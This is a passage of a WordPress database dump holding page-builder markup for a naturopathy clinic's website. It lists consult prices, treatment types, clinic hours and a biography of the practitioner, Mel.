Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $140\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $50\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><br /><br /></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2022-06-30 08:34:29','2022-06-30 00:34:29','',28,'https://verdenaturopathy.com.au/?p=382',0,'revision','',0),(386,1,'2022-10-21 13:04:57','2022-10-21 05:04:57','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2022/01/Screen-Shot-2022-01-21-at-12.20.02-pm.png\" title_text=\"Screen Shot 2022-01-21 at 12.20.02 pm\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<span style=\"font-family: Montserrat; font;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span>\n\n<span style=\"font-family: Montserrat; font\"> </span>\n\n<span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span>\n\n<span style=\"font-family: Montserrat; ;\">Bachelor of Health Science (Naturopathy) </span>\n\n<span style=\"font-family: Montserrat; font-;\">Bachelor of Science (Biological Science) </span>\n\n<span style=\"font-family: Montserrat; ;\"> </span>\n\n<span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span>\n\n<span style=\"font-family: Montserrat; font;\">Australian Natural Therapist’s Association (ANTA) - Full member</span>\n<ul></ul>\n<span style=\"font-family: Montserrat;\"></span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span 